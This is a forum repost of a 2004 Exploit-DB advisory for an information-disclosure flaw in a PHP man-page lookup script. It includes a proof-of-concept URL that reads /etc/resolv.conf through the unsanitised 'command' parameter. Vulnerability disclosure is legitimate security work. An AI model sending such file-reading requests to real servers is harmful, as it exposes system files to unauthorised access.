Exploit Andy's PHP Projects Man Page Lookup Script - Information Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
23536
Проверка EDB
  1. Пройдено
Автор
CABEZON AURELIEN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2004-0071
Дата публикации
2004-01-10
Код:
source: https://www.securityfocus.com/bid/9395/info

A problem in the handling of user-supplied input by Andy's PHP Projects Man Page Lookup script has been reported. Because of this, it is possible for an attacker to gain unauthorized access to sensitive information on a system.

http://www.example.com/manpage/index.php?command=/etc/resolv.conf
 
Источник
www.exploit-db.com

Похожие темы